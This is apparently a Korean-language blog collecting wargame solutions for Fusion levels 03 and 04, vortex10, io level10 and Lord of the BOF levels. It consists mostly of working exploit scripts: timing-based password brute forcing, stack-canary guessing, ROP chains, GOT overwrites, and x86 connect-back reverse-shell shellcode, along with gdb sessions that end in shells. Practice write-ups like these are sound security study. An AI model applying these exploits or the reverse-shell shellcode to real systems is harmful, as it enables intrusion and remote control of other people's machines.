워메.. lob 풀이

워게임/FTZ 2015.10.11 21:42

한 3년전에 쓴거같은데 나한테도 없던 풀이문서가 낙현이한테 있어서 받았다 ㄷㄷㄷ

추억돋네


Smashing_the_Lord_Of_the_Bof.pdf



exploit-exercises fusion level04



binary base address를 브루트포싱으로 구했는데

지금 생각해보니 ssp 메세지에 메모리덤프가 오는걸 까먹고있었다

이거 이용하면 브루트포싱 필요 X


최초실행시 password = '' 밑에 password='~~~~' 를 주석처리하고 

canary = ''

binary = 0으로 설정하고 실행한뒤

다음에 실행할때 세개 값 확인해서 넣어두면 빠르게 가능

password 알아올때 마지막 글자만 분리한 이유는

왜그런지는 아직 모르겠는데 마지막글자만 느리게 나오고 다른 글자가 나오는경우가 많음

그래도 빈도는 맞는글자가 더 많이 나와서 10번 돌려보고 제일 많이 나온글자로 결정 -> 내 테스트환경에선 이렇게 했을때 false positive 없었음


canary는 메모리릭 방법이 딱히 없어서 내 문서의 세번째에 있는 방법 사용

이후 익스플로잇은 그냥 익스플로잇

alarm(15)때문에 쉘은 뜨는데 15초뒤에 쉘 꺼짐



from cd80 import *
from base64 import b64encode as e
from time import sleep, time
import sys
from select import select
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"  # candidate alphabet for every password position
tmp_for_elapsed = []  # response time measured for each candidate in `charset`; reset after every position
tmp_for_char = []  # NOTE(review): assigned here but never read below
password = ''  # leave empty to run stage 1; a preset value skips the timing brute force (see `if not len(password)`)
#password = 'R40xiu0Ngy663KGP'
# Raw x86 shellcode bytes; only sent at the very end of stage 2, not touched here.
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
# ---- stage 1: recover the Basic-auth password through a timing side channel ----
# For each of the first 15 positions every candidate character is sent once and
# the candidate whose reply came back *fastest* is kept (see `mintime` below).
# This relies on the server's response latency depending on how much of the
# credential matched, which the script cannot verify by itself.  The
# defender-side fix is a constant-time comparison of the whole credential.
if not len(password):
    for i in range(0, 15):
        sys.stdout.write("%dth char...[ "%i)
        for j in charset:
            s = makeCon("192.168.81.140", 20004)  # makeCon comes from the `cd80` star import above (not shown)
            request = ""
            
            request += "GET / HTTP/1.1\r\n"
            request += "Authorization: Basic "
            request += e(password + j)  # e = b64encode: prefix recovered so far + one candidate
            request += "\r\n"
            s.send(request)
            start = time()*10000  # wall clock in 0.1 ms units; only the recv() round trip is timed
            s.recv(4096)
            s.recv(4096)
            s.recv(4096)
            tmp_for_elapsed.append((time()*10000-start))
            s.close()
        mintime = sorted(tmp_for_elapsed)[0]  # fastest reply wins this position
        mintime_idx = tmp_for_elapsed.index(mintime)  # first index on exact ties
        password += charset[mintime_idx]
        sys.stdout.write(password+" ]\n")
        tmp_for_elapsed = []

    # The 16th position is handled separately: the timing vote is repeated 10
    # times and the most frequent winner is taken (the author reports this
    # character was noisier than the others).
    print "now trying 10 times for last character..."
    frequency_table = {}  # candidate character -> number of rounds it won
    for i in range(0, 10):

        # all same except : request += e(~~~~~)
        sys.stdout.write("Trying...%d [ "%i)
        for j in charset:
            s = makeCon("192.168.81.140", 20004)
            request = ""
            
            request += "GET / HTTP/1.1\r\n"
            request += "Authorization: Basic "
            request += e("A"*15 + j)  # NOTE(review): prefix is "A"*15 here, not the recovered `password` -- confirm intended
            request += "\r\n"
            s.send(request)
            start = time()*10000
            s.recv(4096)
            s.recv(4096)
            s.recv(4096)
            tmp_for_elapsed.append((time()*10000-start))
            s.close()
        mintime = sorted(tmp_for_elapsed)[0]
        mintime_idx = tmp_for_elapsed.index(mintime)
        sys.stdout.write("%c ]\n"%charset[mintime_idx])
        tmp_for_elapsed = []
        if charset[mintime_idx] in frequency_table:
            frequency_table[charset[mintime_idx]] += 1
        else:
            frequency_table[charset[mintime_idx]] = 1
    # Highest vote count first; sorted() is stable, so ties keep the dict's
    # (arbitrary, Python 2) iteration order.
    password += sorted(frequency_table, key=frequency_table.get, reverse=True)[0]

    print "Final password: %s"%password


#########################
######## stage 2 ########
#########################
def sendpayload(payload):
    """Send one GET whose Basic-auth value is `password + payload` and return the reply.

    Reads the module-level `password` (preset or recovered in stage 1) and uses
    the `makeCon` and `e` (b64encode) helpers.  The reply is collected with at
    most two recv() calls and concatenated; if both fail an empty string is
    returned.  Unlike the stage-1 requests, the header block here is terminated
    with a blank line (CRLF CRLF).
    """
    recved = ''
    s = makeCon("192.168.81.140", 20004)
    request = ""
    request += "GET / HTTP/1.1\r\n"
    request += "Authorization: Basic "
    request += e(password+payload)
    request += "\r\n\r\n"
    
    s.send(request)
    # NOTE(review): a bare `except` swallows *every* exception, including
    # KeyboardInterrupt and programming errors.  A best-effort read should
    # catch socket.error / socket.timeout only.
    try:
        recved = s.recv(4096)
    except:
        pass
    try:
        recved += s.recv(4096)
    except:
        pass
    s.close()
    
    return recved
payload = "A"*2032  # filler up to the stack canary; the distance is specific to this target build
canary = ''  # leave empty to brute force; paste the int printed below to skip on later runs
# ---- stage 2a: recover the 4-byte stack canary one byte at a time ----
# A reply containing "detected" (the stack-smashing message) marks a wrong
# guess; the first byte that does not trigger it is kept and the next byte is
# tried.  This only works if the canary stays identical across connections,
# which the script does not verify.  Defender-side, re-executing per
# connection instead of forking one image gives every connection a fresh canary.
if not canary:
    print "Getting canary...."
    for a in range(0, 0x100):
        recved = sendpayload(payload + chr(a))
        #print "Trying first byte...0x%02x"%a
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(a)
            break
    # NOTE(review): if no byte passes, the loop just runs out with a == 0xff and
    # `canary` stays short; nothing checks that here or in the b/c/d loops below.
    print "First byte:\t0x%02x"%a
    for b in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(b))
        #print "Trying second byte...0x%02x"%b
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(b)
            break
    print "Second byte:\t0x%02x"%b
    for c in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(c))
        #print "Trying third byte...0x%02x"%c
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(c)
            break
    print "Third byte:\t0x%02x"%c
    for d in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(d))
        #print "Trying fourth byte...0x%02x"%d
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(d)
            break
    print "Fourth byte:\t0x%02x"%d
    canary = up(canary)  # 4 raw bytes -> int (cd80 helper, presumably struct.unpack)

print "Canary: 0x%08x"%canary

binary = 0  # leave 0 to search for the image base; paste a known value to skip
# ---- stage 2b: find the binary's image base ----
# Candidates 0xb7000000 + i*0x1000 are tried from high to low.  Each probe
# places two addresses at fixed offsets (0x4118, 0x2a73) from the candidate
# base after the canary and treats a "Not Found" reply as a hit.
if not binary:
    for i in range(0x1000, 0, -1):

        payload = "A"*2032
        payload += p(canary)  # p(): int -> 4 raw bytes (cd80 helper)
        payload += "AAAABBBBCCCC"+p(0xb7000000+i*0x1000+0x4118)+"EEEEFFFFGGGG"
        payload += p(0xb7000000+i*0x1000+0x2a73)
        #    payload += "AAAA"
        print "Trying...[0x%08x]"%(0xb7000000 + i*0x1000)

        if sendpayload(payload).find("Not Found") != -1:
            print "Found binary imagebase: 0x%08x"%(0xb7000000 + i*0x1000)
            binary = 0xb7000000 + i*0x1000
            break
        #sleep(0.1)

# NOTE(review): if the search above fails, `binary` is still 0 and every
# address below is derived from it without any check.
library = binary - 0x1a9000  # libc base: fixed distance from the image base on this target

# Gadget offsets kept for reference; the chain below repeats the literal values.
binary_lea_eax_edx_minus_30 = 0x1af3
binary_popebx_ret = 0x10db
binary_add_ebx_plus_5e5b10c4_eax_popebp_ret = 0x1798

# ---- stage 2c: ROP chain (see the inline comments) ----
# Adjusts calloc@GOT so its PLT stub reaches mprotect, calls it on the page at
# binary+0x4000 with prot 7, then calls read() for up to 0x500 bytes into
# binary+0x4500.  All offsets are specific to this lab binary/libc build.
payload = "A"*2032
payload += p(canary)
payload += "AAAABBBBCCCC"+p(binary+0x4118)+"EEEEFFFFGGGG"
#pop edx; ret
payload += p(library+0x2da2c)
# mprotect - calloc + 0x30
payload += p(0x5b2a0)
# lea eax, [edx - 0x30]; ret
payload += p(binary + 0x1af3)
# pop ebx; ret
payload += p(binary + 0x10db)
# binary + 0x4214 = calloc@GOT
payload += p(binary + 0x4214 - 0x5e5b10c4)
# add [ebx+0x5e5b10c4], eax; pop ebp; ret
payload += p(binary+0x1798)
payload += "AAAA" # dummy for pop ebp

#pop ebx; ret -> recover GOT address stored in ebx
payload += p(binary + 0x10db)
payload += p(binary + 0x4118)

# calloc@PLT => call mprotect
payload += p(binary + 0x1080)
# pppr
payload += p(binary + 0x179c)
# bss
payload += p(binary + 0x4000)
payload += p(0x1000)
payload += p(7)

#pop ebx; ret -> recover GOT address stored in ebx
payload += p(binary + 0x10db)
payload += p(binary + 0x4118)

# read@PLT
payload += p(binary + 0xd20)
payload += p(binary+0x4500)
payload += p(0)
payload += p(binary+0x4500)
payload += p(0x500)
payload += p(0)

# Final request: same shape as stage 1, single CRLF after the header.
s = makeCon("192.168.81.140", 20004)
request = ""
request += "GET / HTTP/1.1\r\n"
request += "Authorization: Basic "
request += e(password+payload)
request += "\r\n"
raw_input("send exploit payload> ")  # manual pause before the final request goes out
s.send(request)
#try:
    #recved = s.recv(4096)
#except:
#    pass
#try:
#    recved += s.recv(4096)
#except:
#    pass

s.send(shellcode)  # presumably consumed by the read() staged at the end of the chain
s.close()



exploit-exercises fusion level03

from cd80 import *
import hmac
import hashlib
import time
s = makeCon("192.168.81.140", 20003)  # makeCon comes from the `cd80` star import above (not shown)
# NOTE(review): eval() on bytes read from the network executes whatever the
# peer sends.  Parse the token explicitly (or use ast.literal_eval) instead.
token = eval(s.recv(4096))
print token

# LHOST=127.0.0.1 LPORT=4321
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
pack = p  # keep the raw 4-byte packer from cd80 before `p` is redefined below
def p(num):
    """Pack `num` with the saved 4-byte packer and render it as two u-escapes.

    Each escape covers two consecutive bytes of the packed value, in packed
    order.  The format string holds two literal backslashes, so each unit in
    the output reads as two backslashes, `u`, then four hex digits.
    """
    raw = pack(num)
    halves = [(ord(raw[k]), ord(raw[k + 1])) for k in (0, 2)]
    return "".join("\\\\u%02x%02x" % pair for pair in halves)

####encode shellcode####
# Pad the shellcode to a multiple of 4 with NUL bytes and emit every 4-byte
# word through p(), so it can sit inside the JSON "contents" string below.
shellcode_encoded = ''
for i in range(0, len(shellcode), 4):
    if len(shellcode[i:]) < 4:
        shellcode += "\x00"*(4-len(shellcode[i:]))
    shellcode_encoded += p(up(shellcode[i:i+4]))  # up(): 4 raw bytes -> int (cd80 helper)

####end of encoding####


##### GOT OVERWRITE & make mprotect(gContents, 0x1000, 7) in bss#####
#####
##### socket -> mprotect
##### setsockopt -> &gContents
#####
#####
# Every address below is an absolute 0x0804xxxx value: specific to this lab
# binary and libc build.
payload = p(0x8049a4f) # pop ebx; ret
payload += p(0xaaa9b898) # socket@GOT(0x804bd5c) - 0x5d5b04c4
payload += p(0x8049b4f) # pop eax; add esp, 0x5c; ret
payload += p(0xffffab80) # (mprotect - socket)&0xffffffff
payload += p(0x41414141)*(0x5c/4) # 23 filler words skipped by `add esp, 0x5c` (Python 2 integer division)
payload += p(0x80493fe) # add [ebx + 0x5d5b04c4], eax; ret
payload += p(0x8048e60) # memcpy@PLT
payload += p(0x804a26d) # pppr
payload += p(0x804bd94) # dest : setsockopt@GOT
payload += p(0x804bdf4) # src : unsigned char *gContents
payload += p(4)
##### construct mprotect(gContents, 0x1000, 7) in bss #####                                 # -1 for page id
# memcpy_bytes[j] is the address of the byte(s) copied into bss at step j and
# memcpy_index[j] how many bytes to take; -1 means "use page_id[i]" instead.
memcpy_bytes = [0x8048ae4, 0x8049082, 0x804857a, 0x8048179, 0x80485a9, 0x804857a, 0x80481d4, -1, 
                        0x804bdf6, 0x80481d4, 0x804814c, 0x80481d4, 0x80481d4, 0x8048a08, 0x80481d4, 
                        0x80481d4, 0x80481d4]
memcpy_index = [1, 1, 2, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
#0x10 ~ 0xf0
page_id = [0x804814c, 0x8048984, 0x80486c4, 0x8048ae4, 0x8048dac, 0x8048b24, 0x8048e8c, 0x80481a0,
               0x8048d37, 0x8048c5c, 0x8048d77, 0x80481bf, 0x8048a04, 0x8048a24, 0x8048d0c]  # one per outer iteration (15)
bss = 0x804be3c
idx = 0  # running write offset into bss
for i in range(0, 15):
    for j in range(0, len(memcpy_index)):
        payload += p(0x8048e60) # memcpy@PLT
        payload += p(0x804a26d) # pppr
        payload += p(bss+idx)
        if memcpy_bytes[j] == -1:
            payload += p(page_id[i])
        else:
            payload += p(memcpy_bytes[j])
        payload += p(memcpy_index[j])
        idx += memcpy_index[j]
setsockopt_bytes = [0x8048984, 0x804bdad, 0x804857a]
setsockopt_index = [1,1,2]
for i in range(0, len(setsockopt_index)):
    payload += p(0x8048e60)  # memcpy@PLT, same gadget pair as above
    payload += p(0x804a26d)  # pppr
    payload += p(bss+idx)
    payload += p(setsockopt_bytes[i])
    payload += p(setsockopt_index[i])
    idx += setsockopt_index[i]
    
payload += p(0x8049207) # pop ebp; ret
payload += p(bss-4)  # ebp := bss-4, so the following leave moves esp to bss
payload += p(0x8049431) # leaveret

##### END OF GOT OVERWRITE #####

# JSON body: "title" carries 127 'a', one u6161 escape, 31 'A' and then the
# chain above; "contents" carries the encoded shellcode.
request = token
request += '\n'
request += '{'
request += '"serverip": "127.0.0.1", '
request += '"title": "'+"a"*(127)+"\\\\u6161"+"A"*31+payload+'", '
request += '"contents": "'+shellcode_encoded
request += '"}//'
# Proof-of-work style search: find a salt i such that HMAC-SHA1(token,
# request + p(i)) begins with two zero bytes (2**16 tries on average).  Note
# p(i) is the u-escape encoder defined above, not raw bytes.
nowhash = 0
i=0
start = time.time()
while i <= 0xffffffff:
    nowhash = hmac.new(token, request+p(i), hashlib.sha1).digest()
    if ord(nowhash[0]) == 0 and ord(nowhash[1]) == 0:
        print "checksum done in %d seconds. salt : %d"%(time.time()-start, i)
        break
    if not i % 10000:
        print "Trying...%d [ %d seconds elapsed ]"%(i, time.time()-start)
    i += 1

# NOTE(review): if the loop runs out without a match, i is 0x100000000 here and
# the request is sent anyway; a 4-byte packer would likely reject that value.
s.send(request+p(i))
s.close()


vortex10 -> vortex11

워게임/vortex 2014.05.22 16:33

http://overthewire.org/wargames/vortex/vortex10.html

숫자를 리스트형태로 주길래 파이썬으로 받아서 C로 넘겨서 시드를 구한 후 파이썬에서 시드를 입력했습니다

solver.c 

#include <stdio.h>
/* Recover the rand() seed from 20 observed outputs.
 * NOTE(review): only <stdio.h> is included above; srand/rand/exit need
 * <stdlib.h> and time needs <time.h>, so they are implicitly declared here.
 * `main` also relies on implicit int. */
main(){
 int i;
 unsigned long currenttime;
 unsigned long seed = 0;            /* offset added to the current time during the search */
 unsigned long numbers[20] = {0,};  /* the 20 observed outputs, read from stdin */
 currenttime = time(0);
 for(i=0; i<20; i++){
  fflush(0);
  scanf("%d", &numbers[i]);  /* NOTE(review): "%d" expects int*, numbers[] is unsigned long -- "%lu" matches */
 }
 
 /* For each candidate (time + seed): re-seed, discard `seed` outputs, then
  * compare the next 20 values with the observed ones.  Why `seed` outputs are
  * discarded is not explained here -- presumably mirrors the target (confirm).
  * The search only terminates on a match (while(1)), and it is feasible at
  * all only because the generator was seeded from the clock; unpredictable
  * values require a CSPRNG rather than rand(). */
 while(1){
  srand(currenttime+seed);
  for(i=0; i<seed; i++){
   rand();
  }
  for(i=0; i<20; i++){
   if(rand() != numbers[i]){
    break;
   }
   if(i==19){
    printf("%d\n", currenttime+seed);  /* all 20 matched: print the seed ("%lu" would match the type) */
    exit(0);
   }
  }
  seed++;
 }
}

 

solver.py

#!/usr/bin/env python
import os  # NOTE(review): imported but unused
from subprocess import Popen, PIPE
from time import sleep
# Run the target, hand its 20 numbers to the C seed solver, then feed the
# recovered seed back.  NOTE(review): shell=True is unnecessary for a fixed
# command without arguments; Popen(["/vortex/vortex10"], ...) avoids the shell.
target = Popen("/vortex/vortex10", stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
arrstring = target.stdout.readline()
print "==========================="
print arrstring
print "==========================="
# The first line has the form "[ hex, hex, ..., hex,]"; the trailing comma
# leaves an empty last element after split(","), hence the [:-1] below.
arrstring = arrstring.split("[")[1]
arrstring = arrstring.split("]")[0]
arrstring = arrstring.split(",")
numbers = []
for num in arrstring[:-1]:
 numbers.append(int(num, 16))  # values are printed as bare hex
solver = Popen("/tmp/cd80_vortex10/solver", stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
print "Sleep"
sleep(3)  # give the solver time to start before writing to its stdin
print "Go"
for i in range(0, 20):
 solver.stdin.write(str(numbers[i])+"\n")  # the solver reads decimal via scanf
 sleep(0.5)
# NOTE(review): readline() blocks until a line or EOF, and at EOF returns ''
# forever -- this loop never ends if the solver exits without printing.
while 1:
 answer = solver.stdout.readline()
 if len(answer) > 0:
  break
# NOTE(review): eval() on the solver's stdout executes arbitrary text; the
# solver prints a plain decimal, so int(answer) is all that is needed.
answer = eval(answer)
print "Answer: %x" % answer
from struct import pack
target.stdin.write(pack("<L",answer)+"\n")  # seed as 4 little-endian bytes
target.stdin.write("cat /etc/vortex_pass/vortex11\n")
print "vortex11 pass : " + target.stdout.readline()

 

vortex10@melinda:/tmp/cd80_vortex10$ ./solver.py
===========================
[ 1800a8a3, 6cbe3892, 19e9ffb8, 152d6f5f, 068dc8e7, 2e0e621b, 136c5cd0, 27405a33, 288b2529, 04d5e971, 2f882704, 3b6ecfa6, 27669c6b, 624831c1, 43e4020a, 65aa718d, 268ba818, 2fc72ed5, 299bdde3, 128aba01,]
===========================
Sleep
Go
Answer: 537da917
vortex11 pass : %8sLEszy9
vortex10@melinda:/tmp/cd80_vortex10$ 

 


level10


이번 문제는 다른문제보다 삽질을 좀 많이 한 문제입니다


먼저 소스를 보여드리겠습니다


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>


int main(int argc, char **argv){

        FILE *fp = fopen("/levels/level10_alt.pass", "r");

        /* pass and msg_err are adjacent 20-byte fields of one stack object */
        struct {char pass[20], msg_err[20]} pwfile = {{0}};

        /* zero-length array: every index into it is out of bounds */
        char ptr[0];


        if(!fp || argc != 2)

                return -1;


        fread(pwfile.pass, 1, 20, fp);

pwfile.pass[19] = 0;

        /* The index comes straight from argv[1] via atoi() with no range
         * check, so this writes a single zero byte at an attacker-chosen
         * offset from ptr.  Validating the index (or removing the write)
         * is the fix. */
        ptr[atoi(argv[1])] = 0;

        fread(pwfile.msg_err, 1, 19, fp);  /* 19 bytes; the zero initialiser keeps byte 19 as the terminator */

        fclose(fp);


        if(!strcmp(pwfile.pass, argv[1]))

                execl("/bin/sh", "sh", 0);  /* the terminating 0 should be (char *)NULL for portability */

        else

                puts(pwfile.msg_err);  /* prints whatever the second fread left in msg_err */



        return 0;

} 

/levels/level10_alt.pass 에 level10 계정의 읽기권한이 없기때문에

gdb로 이 프로그램을 그대로 실행 할 경우 fopen이 실패합니다

소스에서 ptr[atoi(argv[1])] = 0; <- 이부분이 프로그램의도와는 전혀 상관없는 부분이기 때문에

이부분을 이용해서 푸는게 의도인건 알았는데 어디를 덮어씌워야할지 난감했습니다


먼저 메모리 레이아웃을 말씀드리면

ptr    = ebp - 0x58

pwfile.pass    ebp - 0x48

pwfile.msg_err    ebp - 0x34

이런식으로 위치합니다

따라서 ptr[16] = 0 을 하면 pwfile.pass는 공백으로 만들수 있지만 argv[1]이 "16"이기 때문에 strcmp는 어쨌든 실패합니다


그런데 strcmp가 실패할경우 pwfile.msg_err를 출력합니다

strcmp가 실패하면 그냥 단순하게 puts("ACCESS DENIED..."); 를 출력하면되는데

저 메세지를 굳이 파일에 넣는단건

pwfile.msg_err = pwfile.pass 가 되게 해 pass를 출력하게 하면 된다는 뜻입니다


원래 삽질을 소스를 복사해서 컴파일해 하고 있었는데

원본바이너리랑 차이가 좀 심해서

원본바이너리를 복사해 hexedit으로 fopen 인자로 들어가는 문자열을 수정해서 테스트 해봤습니다



그런데 디버깅하면서 보니 fopen의 리턴값이 힙영역 주소가 나와서

힙영역 메모리를 덤프떠보니 pwfile.pass와 pwfile.msg_err 내용을 가르키는 포인터들이 있단걸 확인했습니다




(gdb) disp/i $pc

1: x/i $pc

=> 0x8048575 <main+177>: call   0x80483f8 <fread@plt>

(gdb) x/50wx 0x804a00c

0x804a00c: 0xb7fde014 0xb7fde025 0xb7fde000 0xb7fde000

0x804a01c: 0xb7fde000 0xb7fde000 0xb7fde000 0xb7fdf000

0x804a02c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a03c: 0xb7fd0580 0x00000007 0x00000000 0x00000000

0x804a04c: 0x00000000 0x0804a0a0 0xffffffff 0xffffffff

0x804a05c: 0x00000000 0x0804a0ac 0x00000000 0x00000000

0x804a06c: 0x00000000 0xffffffff 0x00000000 0x00000000

0x804a07c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a08c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a09c: 0xb7fcf9e0 0x00000000 0x00000000 0x00000000

0x804a0ac: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a0bc: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a0cc: 0x00000000 0x00000000

(gdb) x/s 0xb7fde014

0xb7fde014: "ACCESS DENIED...\n"

(gdb) x/s 0xb7fde000

0xb7fde000: "passwordpasswordtestACCESS DENIED...\n"

(gdb) 

0xb7fde014 에서 최하위바이트만 0으로 맞춰주면

패스워드가 그대로 있습니다


io.smashthestack.org 가 ASLR이 꺼져있기때문에

ptr의 주소는 항상 일정합니다

argv[1]에 따라 main함수의 ebp가 바뀌니 일단 없이 넣어주고 argv[1]에 들어가야되는 숫자의 자리수를 확인해 다시 넣어준 뒤의 ebp를 확인합니다

level10@io:/tmp/cd$ gdb -q level10

Reading symbols from /tmp/cd/level10...(no debugging symbols found)...done.

(gdb) b main

Breakpoint 1 at 0x80484c8

(gdb) r

Starting program: /tmp/cd/level10 


Breakpoint 1, 0x080484c8 in main ()

(gdb) i r ebp

ebp            0xbffffcb8 0xbffffcb8

(gdb) p $ebp - 0x58

$1 = (void *) 0xbffffc60

(gdb) p 0x804a00c - 0xbffffc60

$2 = 1208263596

(gdb) r 1208263596

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /tmp/cd/level10 1208263596


Breakpoint 1, 0x080484c8 in main ()

(gdb) i r ebp

ebp            0xbffffca8 0xbffffca8

(gdb) p $ebp - 0x58

$3 = (void *) 0xbffffc50

(gdb) p 0x804a00c - 0xbffffc50

$4 = 1208263612

(gdb)


level10@io:/tmp/cd$ /levels/level10 1208263612

AverYloNgPassword!!

level10@io:/tmp/cd$ 

쉘에서 느낌표를 넣어주려고 했는데 잘 안돼서 파일에 넣고 argv에 넣었습니다


level10@io:/tmp/cd$ cat > ./pass

AverYloNgPassword!!

level10@io:/tmp/cd$ /levels/level10 $(cat ./pass)

sh-4.2$ whoami

level11

sh-4.2$



dark_stone -> cruel

워게임/Lord Of the BOF 2013.10.15 14:42

 

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

 

스택에 있는 값을 인자로 사용해 execve함수를 호출했습니다

 

 

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  

 


evil_wiard -> dark_stone

워게임/Lord Of the BOF 2013.10.15 14:14

 

 

이번 문제도 저번문제처럼 .bss에 RTL 페이로드를 복사해 풀려 했으나

execve함수에서 자꾸 Bad Address에러가 나서 실패했습니다

원인에 대한 분석을 언제할진 모르겠지만 하게되면 블로그에 올리겠습니다

 

그래서 printf -> system 으로 got overwrite 해 풀었습니다

 

풀면서 노트한 내용입니다

 

0x8048408 printf@PLT
0x804984c printf@GOT
0x8048438 strcpy@PLT
0x80484f3 ppr

0x007507c0 system@LIBC
0x00833603 "/bin/sh"@LIBC

strcpy( 0x8049850, "0x007507c0" )


0x80482b4 0xc0 0x8049850 \x4c\x98\x04\x08\xd0\x84\x04\x08
0x8048364 0x07 0x8049851 \x4d\x98\x04\x08\x64\x83\x04\x08
0x80484d0 0x75 0x8049852 \x4e\x98\x04\x08\xb4\x82\x04\x08
0x804833c 0x00 0x8049853 \x4f\x98\x04\x08\x3c\x83\x04\x08

strcpy + ppr \x38\x84\x04\x08\xf3\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x4c\x98\x04\x08\xd0\x84\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4d\x98\x04\x08\x64\x83\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4e\x98\x04\x08\xb4\x82\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4f\x98\x04\x08\x3c\x83\x04\x08

 


hell_fire -> evil_wizards

워게임/Lord Of the BOF 2013.10.12 11:38

 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// magic potion for you
/* Gadget deliberately shipped with the challenge: two pops then ret. */
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
/* NOTE(review): the listing as printed has no #include lines, so printf,
 * strlen, memcpy and the setre*id calls are implicitly declared; the
 * function also falls off the end without returning a value. */
int main(int argc, char *argv[])
{
 char buffer[256];
 char saved_sfp[4];
 int length;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // for disturbance RET sleding
 length = strlen(argv[1]);
  
        // healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 // Unbounded strcpy into a 256-byte buffer: the defect. Only the 4 bytes at
 // buffer+264 are restored afterwards; everything else written past the
 // buffer stays overwritten.  strncpy/strlcpy with the buffer size is the fix.
 strcpy(buffer, argv[1]);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        // zeroes memory from the end of the copied string up to 0xff000000
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$ 

 

아래는 원래 텍스트가 길어서 짤려서 보기좋게 개행했습니다

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\
x04\x08"x100, "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\
x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x0
8\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\
x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x0
4\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\
x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81
\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x
08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba
\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x
04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08", "\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
